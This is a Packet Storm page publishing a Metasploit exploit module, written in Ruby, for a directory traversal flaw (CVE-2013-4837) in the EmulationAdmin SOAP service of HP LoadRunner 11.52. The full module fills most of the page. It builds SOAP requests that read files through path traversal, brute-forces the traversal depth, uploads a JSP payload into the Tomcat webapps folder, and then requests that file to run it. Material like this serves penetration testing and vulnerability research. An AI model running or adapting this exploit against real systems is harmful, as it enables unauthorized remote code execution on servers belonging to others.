exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

HP LoadRunner EmulationAdmin Web Service Directory Traversal

HP LoadRunner EmulationAdmin Web Service Directory Traversal
Posted Dec 11, 2013
Site metasploit.com

This Metasploit module exploits a directory traversal vulnerability on the version 11.52 of HP LoadRunner. The vulnerability exists on the EmulationAdmin web service, specifically in the copyFileToServer method, allowing to upload arbitrary files. This Metasploit module has been tested successfully on HP LoadRunner 11.52 over Windows 2003 SP2.

tags | exploit, web, arbitrary
systems | windows
advisories | CVE-2013-4837, OSVDB-99231
SHA-256 | 3ecfa30b0524d6d84a7b8d523d5b32e43379309197e84b8213bd82d2450eebc7

HP LoadRunner EmulationAdmin Web Service Directory Traversal

Change Mirror Download
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rexml/document'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

HttpFingerprint = { :pattern => [ /Apache-Coyote\/1\.1/ ] }

include REXML
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
'Name' => 'HP LoadRunner EmulationAdmin Web Service Directory Traversal',
'Description' => %q{
This module exploits a directory traversal vulnerability on the version 11.52 of HP
LoadRunner. The vulnerability exists on the EmulationAdmin web service, specifically
in the copyFileToServer method, allowing to upload arbitrary files. This module has
been tested successfully on HP LoadRunner 11.52 over Windows 2003 SP2.
},
'Author' =>
[
'rgod <rgod[at]autistici.org>', # Vulnerability Discovery
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-4837' ],
[ 'OSVDB', '99231' ],
[ 'BID', '63475' ],
[ 'ZDI', '13-259' ],
[ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03969437' ]
],
'Privileged' => true,
'Platform' => 'win',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'HP LoadRunner 11.52', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 30 2013'))

register_options(
[
Opt::RPORT(8080),
# By default files dropped into C:\windows\system32\null\
OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 3 ]),
# By default HP LoadRunner installed on C:\Program Files\HP\LoadRunner
OptString.new('INSTALLPATH', [ true, 'HP LoadRunner Install Path (from the root folder)', "Program Files\\HP\\LoadRunner" ])
], self.class)
end

def get_soap_request(action, opts={})
path_param = opts[:path]
contents_param = opts[:contents]

se_name = ''
case action
when :upload
se_name = 'ser:copyFileToServer'
when :read
se_name = 'ser:getFileContentAsLines'
end

xml = Document.new
xml.add_element(
"soapenv:Envelope",
{
'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance",
'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema",
'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/",
'xmlns:ser' => "http://service.emulation.ws.mercury.com"
})
xml.root.add_element("soapenv:Header")
xml.root.add_element("soapenv:Body")
body = xml.root.elements[2]
body.add_element(
se_name,
{
'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/"
})
ser = body.elements[1]
ser.add_element("in0", {'xsi:type' => 'xsd:int'})
ser.elements['in0'].text = 30000 + rand(30000)
ser.add_element("in1", {'xsi:type' => 'xsd:string'})
ser.elements['in1'].text = path_param

if action == :upload
ser.add_element("in2", {'xsi:type' => "xsd:base64Binary"})
ser.elements['in2'].text = Rex::Text.encode_base64(contents_param)
end

xml.to_s
end

def check
depth = datastore['DEPTH']
install_path = datastore['INSTALLPATH']

print_status("#{peer} - Detecting tomcat version...")
tomcat_version = get_tomcat_version

if tomcat_version
print_status("#{peer} - Tomcat #{tomcat_version} detected... Verifying traversal...")
location = ""
location << install_path
location << "\\" unless install_path.ends_with("\\") or install_path.ends_with("/")
location << "apache-tomcat-#{tomcat_version}\\webapps\\ServiceEmulation"

res = read_file(depth, location, "index.jsp")

if res and res.code == 200 and res.body.to_s =~ /HP Service Emulation/
print_good("#{peer} - Traversal exists and parameters are correct...")
return Exploit::CheckCode::Vulnerable
elsif res and res.code == 500 and res.body.to_s =~ /FileNotFoundException/
print_warning("#{peer} - Traversal appears to exist, try adjusting parameters DEPTH and INSTALLPATH...")
return Exploit::CheckCode::Appears
else
print_status("#{peer} - Failed to verify the directory traversal...")
end
else
print_error("#{peer} - Tomcat version not detected...")
end

print_status("#{peer} - Checking if the vulnerable web service and method exist...")
res = send_request_cgi({
'uri' => normalize_uri('ServiceEmulation', 'services', 'EmulationAdmin'),
'vars_get' => { 'wsdl' => 1 }
})

if res and res.code == 200 and res.body.to_s =~ /wsdl.*EmulationAdmin/ and res.body.to_s =~ /copyFileToServerRequest/
return Exploit::CheckCode::Detected
end

return Exploit::CheckCode::Safe
end

def exploit
depth = datastore['DEPTH']
install_path = datastore['INSTALLPATH']

print_status("#{peer} - Retrieving the Tomcat version used...")
tomcat_version = get_tomcat_version

if tomcat_version.nil?
fail_with(Failure::NoTarget, "#{peer} - Failed to retrieve the Tomcat version used")
else
print_good("#{peer} - Tomcat #{tomcat_version} found")
end

print_status("#{peer} - Verifying parameters to exploit the directory traversal...")
brute_force = false
location = ""
location << install_path
location << "\\" unless install_path.ends_with("\\") or install_path.ends_with("/")
location << "apache-tomcat-#{tomcat_version}\\webapps\\ServiceEmulation"

res = read_file(depth, location, "index.jsp")

if res and res.code == 200 and res.body.to_s =~ /HP Service Emulation/
print_good("#{peer} - Traversal parameters are correct")
elsif res and res.code == 500 and res.body.to_s =~ /FileNotFoundException/
print_error("#{peer} - Traversal parameters are incorrect, will try to brute force depth...")
brute_force = true
else
fail_with(Failure::Unknown, "#{peer} - Unknown error while verifying the traversal parameters")
end

if brute_force
print_status("#{peer} - Trying to brute force the traversal depth...")
depth = brute_force_depth(location)
if depth.nil?
fail_with(Failure::BadConfig, "#{peer} - Traversal parameters are incorrect, try setting DEPTH and INSTALLPATH")
end
print_good("#{peer} - Using #{depth} as depth length to exploit the traversal...")
end

jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"

# It's uploading a JSP payload because AutoDeploy on the webapps directory isn't working on my tests
print_status("#{peer} - Uploading the JSP payload...")
res = upload_file(depth, location, jsp_name, payload.encoded)

if res and res.code == 200 and res.body.to_s =~ /copyFileToServerResponse/ and res.body.to_s !~ /faultcode/
print_status("#{peer} - JSP payload uploaded successfully")
register_files_for_cleanup("..\\..\\#{location}\\#{jsp_name}")
else
fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed")
end

print_status("#{peer} - Executing payload on #{normalize_uri('ServiceEmulation', 'services', 'EmulationAdmin', jsp_name)}...")

send_request_cgi({
'uri' => normalize_uri('ServiceEmulation', jsp_name),
'method' => 'GET'
}, 1)
end

def send_request_soap(soap_request)
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ServiceEmulation', 'services', 'EmulationAdmin'),
'method' => 'POST',
'ctype' => 'text/xml; charset=UTF-8',
'data' => soap_request,
'headers' => {
'SOAPAction' => '""',
}
})

return res
end

def upload_file(traversal_depth, location, file_name, contents)
path = "..\\" * traversal_depth
path << location
path << "\\" unless location[-1] == "/" or location[-1] == "\\"
path << file_name

req = get_soap_request(:upload, {:path => path, :contents => contents})

return send_request_soap(req)
end

def read_file(traversal_depth, location, file_name)
path = "..\\" * traversal_depth
path << location
path << "\\" unless location[-1] == "/" or location[-1] == "\\"
path << file_name

req = get_soap_request(:read, {:path => path})

return send_request_soap(req)
end

def brute_force_depth(location)
10.times do |i|
res = read_file(i, location, "index.jsp")

if res and res.code == 200 and res.body.to_s =~ /HP Service Emulation/
return i
end
end

return nil
end

def get_tomcat_version
res = send_request_cgi({
'uri' => normalize_uri('webdav')
})

if res and res.code == 200 and res.body.to_s =~ /Apache Tomcat\/([\d\.]+)/
return $1
end

return nil
end

end
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close